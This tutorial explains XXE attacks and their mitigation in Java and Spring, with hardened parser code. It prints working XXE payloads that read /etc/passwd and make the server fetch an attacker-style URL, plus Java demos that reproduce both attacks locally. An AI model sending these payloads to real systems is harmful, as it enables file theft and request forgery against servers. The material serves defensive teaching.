XML is a markup language that we use to define and categorize data. Data stored in XML format can move between multiple servers or between a client and a server.
Once a server receives an XML input, it parses it via an XML parser. XML external entities are basically references in the XML document to files or URLs outside of the XML document. Essentially, it’s an XML standard feature that enables accessing and/or loading external resources.
However, this feature can be dangerous: it can allow malicious actors to read file contents, retrieve sensitive data they aren't authorized to see, and mount server-side request forgery attacks.
What Is XXE?
XML documents adhere to a certain standard. This standard highlights how the XML document should be constructed, outlines what differentiates a valid XML document from an invalid one, and so forth.
The standard also specifies a term called “entity.” An entity is a placeholder for some content.
Entities can be internal or, as in our case, external.
External entities are accessed via a system identifier. This identifier is a pointer to a location, which can be either a file or a URL. The standard specifies what should happen when an XML parser encounters such an entity.
It fetches the file or URL that the system identifier points to and replaces each reference to the entity with the fetched contents. For instance, suppose we have an XML document that looks like this:
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE Catalog [
  <!ENTITY xxe SYSTEM "file:///etc/passwd">
]>
<Catalog>
  <Movie>
    <Title>World War Z</Title>
    <Director>Marc Forster</Director>
    <Country>USA</Country>
    <Year>2013</Year>
    &xxe;
  </Movie>
</Catalog>
The entity reference &xxe; inside the Movie element will be replaced with the contents of the password file at file:///etc/passwd, which can look like this:
alexander:x:1000:1000:Alexander:/home/alexander:/bin/bash
flatpak:x:978:976:User for flatpak system helper:/:/sbin/nologin
jenkins:x:977:975:Jenkins Automation Server:/var/lib/jenkins:/bin/false
nginx:x:976:974:Nginx web server:/var/lib/nginx:/sbin/nologin
redis:x:975:973:Redis Database Server:/var/lib/redis:/sbin/nologin
mysql:x:27:27:MySQL Server:/var/lib/mysql:/sbin/nologin
systemd-oom:x:967:967:systemd Userspace OOM Killer:/:/usr/sbin/nologin
Thus, this scenario discloses sensitive user information. Note that this is not a bug but a feature of the XML specification. The problem arises when the parser is allowed to resolve external entities and we don't validate the input we receive from the client.
We’ll cover this more in depth later.
Let's assume you're browsing an e-commerce website. To retrieve the specification for a certain product (size, weight, price, etc.), the client (in this case, our browser) sends an XML document to the server with the product's ID:
<?xml version="1.0" encoding="UTF-8"?>
<product>1478</product>
The server, in turn, should return a response similar to this one:
<?xml version="1.0" encoding="UTF-8"?>
<product>
  <id>1478</id>
  <name>Trinket Box</name>
  <description>Small Trinket Box, playing "Mary Had a Little Lamb"</description>
  <color>blue</color>
  <price>10</price>
</product>
However, if the server doesn’t validate the input properly, we can emulate the client’s call and send the following payload instead:
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE foo [ <!ENTITY xxe SYSTEM "file:///etc/passwd"> ]>
<product>&xxe;</product>
This will result in the following response from the server:
Invalid product id: alexander:x:1000:1000:Alexander:/home/alexander:/bin/bash
flatpak:x:978:976:User for flatpak system helper:/:/sbin/nologin
jenkins:x:977:975:Jenkins Automation Server:/var/lib/jenkins:/bin/false
nginx:x:976:974:Nginx web server:/var/lib/nginx:/sbin/nologin
redis:x:975:973:Redis Database Server:/var/lib/redis:/sbin/nologin
mysql:x:27:27:MySQL Server:/var/lib/mysql:/sbin/nologin
systemd-oom:x:967:967:systemd Userspace OOM Killer:/:/usr/sbin/nologin
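The exchange above can be reproduced locally. The following is a minimal sketch, assuming the server uses the JDK's built-in DOM parser at its default settings; the class NaiveProductLookup and its methods are hypothetical names made up for this illustration, and a throwaway temp file stands in for /etc/passwd.

```java
import java.io.ByteArrayInputStream;
import java.nio.charset.StandardCharsets;
import java.nio.file.Files;
import java.nio.file.Path;
import javax.xml.parsers.DocumentBuilder;
import javax.xml.parsers.DocumentBuilderFactory;
import org.w3c.dom.Document;

// Hypothetical stand-in for the e-commerce endpoint; not taken from a real application.
class NaiveProductLookup {

    // Reads the product ID from the request body using a factory left at its
    // defaults, which means external entities get resolved.
    static String readProductId(String requestXml) throws Exception {
        DocumentBuilderFactory factory = DocumentBuilderFactory.newInstance();
        DocumentBuilder builder = factory.newDocumentBuilder();
        Document doc = builder.parse(
                new ByteArrayInputStream(requestXml.getBytes(StandardCharsets.UTF_8)));
        return doc.getDocumentElement().getTextContent();
    }

    // Builds the payload shown above, pointed at an arbitrary local file.
    static String payloadFor(Path file) {
        return "<?xml version=\"1.0\" encoding=\"UTF-8\"?>"
                + "<!DOCTYPE foo [ <!ENTITY xxe SYSTEM \"" + file.toUri() + "\"> ]>"
                + "<product>&xxe;</product>";
    }

    public static void main(String[] args) throws Exception {
        // A throwaway file stands in for /etc/passwd so the demo stays harmless.
        Path secret = Files.createTempFile("secret", ".txt");
        Files.writeString(secret, "alexander:x:1000:1000:Alexander:/home/alexander:/bin/bash");
        try {
            // The "product ID" the server sees is the file's contents.
            System.out.println("Invalid product id: " + readProductId(payloadFor(secret)));
        } finally {
            Files.delete(secret);
        }
    }
}
```

The point of the sketch is that nothing in readProductId looks dangerous: the leak comes entirely from the parser's defaults, not from any explicit file access in the application code.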
In addition to exposing file contents, an XXE can be used to carry out server-side request forgery (SSRF).
Consider this line in the example above:
<!DOCTYPE foo [ <!ENTITY xxe SYSTEM "file:///etc/passwd"> ]>
If the attacker replaces it with a reference to an external URL,
<!DOCTYPE foo [ <!ENTITY xxe SYSTEM "http://malicous-code.com"> ]>
the server will send a request to that URL when it parses the document.
If the entity is then referenced further down the XML document, the server will return the content fetched from the malicious website instead of the intended response.
In turn, this can have serious implications for the application's end users.
Consider a website that responds with a form to enter a username and password. If this form was generated due to an SSRF caused by an XXE, the attacker can get the website user’s credentials.
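The outbound request can also be observed locally. The sketch below is an illustration only, assuming the JDK's built-in DOM parser at its default settings: it starts a throwaway HTTP server on the loopback interface to play the attacker's host, then parses a payload whose entity points at it. The class XxeSsrfDemo, its Result type, and the response text are all invented for this example.

```java
import com.sun.net.httpserver.HttpServer;
import java.io.ByteArrayInputStream;
import java.net.InetSocketAddress;
import java.nio.charset.StandardCharsets;
import java.util.concurrent.atomic.AtomicInteger;
import javax.xml.parsers.DocumentBuilderFactory;
import org.w3c.dom.Document;

// Hypothetical demo class; the names here are not part of any real API.
class XxeSsrfDemo {

    static final class Result {
        final int requestsSeen;        // how many requests reached the "attacker" server
        final String substitutedText;  // what the parser put in place of &xxe;

        Result(int requestsSeen, String substitutedText) {
            this.requestsSeen = requestsSeen;
            this.substitutedText = substitutedText;
        }
    }

    static Result run() throws Exception {
        AtomicInteger requests = new AtomicInteger();
        byte[] body = "attacker-controlled".getBytes(StandardCharsets.UTF_8);

        // Throwaway server on a free loopback port; it plays the attacker's host.
        HttpServer server = HttpServer.create(new InetSocketAddress("127.0.0.1", 0), 0);
        server.createContext("/", exchange -> {
            requests.incrementAndGet();
            exchange.sendResponseHeaders(200, body.length);
            exchange.getResponseBody().write(body);
            exchange.close();
        });
        server.start();
        try {
            String url = "http://127.0.0.1:" + server.getAddress().getPort() + "/";
            String payload = "<?xml version=\"1.0\" encoding=\"UTF-8\"?>"
                    + "<!DOCTYPE foo [ <!ENTITY xxe SYSTEM \"" + url + "\"> ]>"
                    + "<product>&xxe;</product>";
            // Parsing alone triggers the HTTP request; no application code calls the URL.
            Document doc = DocumentBuilderFactory.newInstance().newDocumentBuilder()
                    .parse(new ByteArrayInputStream(payload.getBytes(StandardCharsets.UTF_8)));
            return new Result(requests.get(), doc.getDocumentElement().getTextContent());
        } finally {
            server.stop(0);
        }
    }

    public static void main(String[] args) throws Exception {
        Result r = run();
        System.out.println("requests seen by the server: " + r.requestsSeen);
        System.out.println("text substituted for &xxe;: " + r.substitutedText);
    }
}
```

In a real attack the URL would more likely point at an internal service that only the vulnerable server can reach, which is what makes this class of request forgery dangerous.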
Mitigating XXE Vulnerability
Now that we've discussed what an XXE vulnerability is, let's see how we can mitigate this risk in Java and Java Spring.
Java and XXE
As said in the OWASP XXE cheatsheet, “Java applications using XML libraries are particularly vulnerable to XXE because the default settings for most Java XML parsers is to have XXE enabled. To use these parsers safely, you have to explicitly disable XXE in the parser you use.”
As previously said, XML parsers parse XML documents. To mitigate XXEs, we either need to validate all input, which can be time-consuming and tedious, or disable the processing of external entities in XML documents entirely.
Since most configurations in Java applications are now done with Java annotations and not XML, the rule of thumb recommendation for mitigating XXEs is to disable XXE processing entirely.
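As a rough sketch of what disabling XXE processing can look like with the JDK's built-in DOM parser, the factory below rejects any document that carries a DOCTYPE and switches off external entities as a second line of defense. The feature URIs are the ones listed in the OWASP cheat sheet; the class HardenedDomParser and its method names are hypothetical, and other parser implementations may not recognize every feature.

```java
import java.io.ByteArrayInputStream;
import java.io.IOException;
import java.nio.charset.StandardCharsets;
import javax.xml.XMLConstants;
import javax.xml.parsers.DocumentBuilderFactory;
import javax.xml.parsers.ParserConfigurationException;
import org.w3c.dom.Document;
import org.xml.sax.SAXException;

// Hypothetical helper class; the names are illustrative only.
class HardenedDomParser {

    static DocumentBuilderFactory newHardenedFactory() throws ParserConfigurationException {
        DocumentBuilderFactory factory = DocumentBuilderFactory.newInstance();
        // Reject any document that contains a DOCTYPE, so no entity can be declared at all.
        factory.setFeature("http://apache.org/xml/features/disallow-doctype-decl", true);
        // Defense in depth, in case DOCTYPEs ever have to be allowed again.
        factory.setFeature("http://xml.org/sax/features/external-general-entities", false);
        factory.setFeature("http://xml.org/sax/features/external-parameter-entities", false);
        factory.setFeature(XMLConstants.FEATURE_SECURE_PROCESSING, true);
        factory.setXIncludeAware(false);
        factory.setExpandEntityReferences(false);
        return factory;
    }

    static Document parse(String xml)
            throws ParserConfigurationException, SAXException, IOException {
        return newHardenedFactory().newDocumentBuilder()
                .parse(new ByteArrayInputStream(xml.getBytes(StandardCharsets.UTF_8)));
    }

    // Returns true when the hardened parser refuses the document.
    static boolean isRejected(String xml) {
        try {
            parse(xml);
            return false;
        } catch (SAXException e) {
            return true; // the parser refused the input, e.g. because of the DOCTYPE
        } catch (ParserConfigurationException | IOException e) {
            throw new IllegalStateException(e);
        }
    }

    public static void main(String[] args) {
        String attack = "<?xml version=\"1.0\" encoding=\"UTF-8\"?>"
                + "<!DOCTYPE foo [ <!ENTITY xxe SYSTEM \"file:///etc/passwd\"> ]>"
                + "<product>&xxe;</product>";
        System.out.println("attack rejected: " + isRejected(attack));
        System.out.println("plain request rejected: " + isRejected("<product>1478</product>"));
    }
}
```

Rejecting the DOCTYPE outright is the bluntest option; it fits applications that never need DTDs, which is the common case when XML is only used as a message format.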
The Spring framework is a popular Java framework for developing enterprise and web applications. Originally written by Rod Johnson in the early 2000s and later maintained by Pivotal, it's still going strong today.
As XML was at the height of its popularity at the time, Spring originally based its configuration entirely on XML. The original developers used XML throughout the system for everything from defining Java beans to configuring the database connection to defining object dependency injection.
Although the Spring developers have gradually replaced XML configuration with Java-based annotations, XML configuration is still fully supported and can be found in abundance in old Java enterprise applications. That explains the increased importance of mitigating XXE vulnerabilities in Java Spring.
Mitigating Spring XXE
Luckily, Spring has XXE parsing disabled by default. This means that you’re covered in the vast majority of cases. However, there are two caveats to this statement:
- There are many XML parsers you can use in Java, and if you use an XML parser that doesn’t come bundled by default with Spring, you might need to manually disable XXE or carefully validate the input and make sure that you trust the source the entities come from.
- Several versions of Spring had XXE vulnerabilities in the past. Basically, those versions had XXE enabled by default. So, if you’re using one of those versions, you need to upgrade as soon as possible to a patched version. As stated on the OWASP website, the affected versions are
- 3.0.0 to 3.2.3 (Spring OXM and Spring MVC),
- 4.0.0.M1 (Spring OXM), and
- 4.0.0.M1-4.0.0.M2 (Spring MVC).
To fully address these issues, you need to upgrade to Spring Framework 3.2.8+ or 4.0.2+.
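For the first caveat, each parser API has its own switches. As one example, here is a minimal sketch for the JDK's StAX API (XMLInputFactory), assuming the application never needs DTDs; the class HardenedStaxReader and its methods are hypothetical names, and third-party parsers may expose different properties.

```java
import java.io.StringReader;
import javax.xml.stream.XMLInputFactory;
import javax.xml.stream.XMLStreamConstants;
import javax.xml.stream.XMLStreamException;
import javax.xml.stream.XMLStreamReader;

// Hypothetical helper class; the names are illustrative only.
class HardenedStaxReader {

    static XMLInputFactory newHardenedFactory() {
        XMLInputFactory factory = XMLInputFactory.newInstance();
        // Ignore DTDs, so entity declarations in the input are never processed.
        factory.setProperty(XMLInputFactory.SUPPORT_DTD, false);
        // Belt and braces: never resolve external entities.
        factory.setProperty(XMLInputFactory.IS_SUPPORTING_EXTERNAL_ENTITIES, false);
        return factory;
    }

    // Concatenates all character data in the document.
    // Depending on the implementation, a reference to an undeclared entity is
    // either reported as an XMLStreamException or left unexpanded.
    static String readText(String xml) throws XMLStreamException {
        XMLStreamReader reader =
                newHardenedFactory().createXMLStreamReader(new StringReader(xml));
        StringBuilder text = new StringBuilder();
        try {
            while (reader.hasNext()) {
                if (reader.next() == XMLStreamConstants.CHARACTERS) {
                    text.append(reader.getText());
                }
            }
        } finally {
            reader.close();
        }
        return text.toString();
    }

    public static void main(String[] args) throws XMLStreamException {
        System.out.println(readText("<product>1478</product>"));
    }
}
```

Whichever parser is in use, the idea is the same: find its equivalent of these two settings and turn them off before the parser ever sees client input.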
Note that another way to avoid the XXE issue altogether is to use a different format for sending messages between multiple servers or between client and server.
In recent years, the most popular such format has been JSON, which doesn't introduce this kind of vulnerability. Likewise, you can replace XML-based SOAP APIs with simple HTTP REST APIs, which don't usually use XML.
XML is a useful format for defining and representing structured data. As part of the XML standard, it’s possible to import entities from external resources.
Although this can be a useful feature, it also poses a security risk. Malicious actors can inject their values into the XML, and if the server is not hardened, the system can become compromised.
Files can be stolen, and server responses can be forged. Java applications are especially vulnerable to such attacks, as most Java XML parsers resolve external entities by default.
Spring is a popular Java framework. Fortunately, it comes with XXE parsing disabled. However, XXE was enabled in several Spring versions in the past. Lastly, if you use an XML parser other than the one built into Spring, you'll need to manually validate the input or disable XXE parsing.